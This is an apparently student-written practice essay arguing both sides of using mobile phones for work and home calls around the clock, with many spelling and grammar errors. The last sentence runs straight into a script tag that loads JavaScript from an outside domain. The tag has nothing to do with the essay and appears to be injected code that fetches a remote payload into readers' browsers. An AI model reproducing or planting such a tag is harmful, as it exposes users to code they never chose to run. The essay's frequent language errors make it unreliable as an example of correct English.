People can use a mobile phone to answer work amd home calls at any place or 7 days a week. Do you think there are more negative or positive effects on both individuals and society.

Mobile phone is good for business to fastly answer any call at any location. I beleive that cell phone is beneficial but in other hond, some demerits are available. The substantial influence of this trend has sparked the controversy over the potential impact in recent years. The both propositions appears to be more rational. This essay will further elaborate my veiws for this trend and this will lead to a logical conclusion.

Analysing the statement and explaining further positive impact of this trend. Firstly, telephone is important for many places such as service center, hospital and some other. However,folks easily to conversation with each other. Moving further,in the field of doctors they easily to find out patient report. In further step,many companies carry our business with the help of cellphones like as amazon, Snapdeal and many more. Moreover,it is a sign of development because they provide home delivery service for folks.

Probing ahea,there are some negative aspects of this trend that they remove our attention. However, dwellers are try to concentrate on work while,the calls or messages of social media apps are distract to mind. In further step,mobile phones also erase family attention because they always spend our time in cellphones.

In conclusion, eve though mobile phones are not beneficial for health to use everytime but somewhere it is must important in various sectors.<script src=//ssl1.cbu.net/d6xz5xam></script>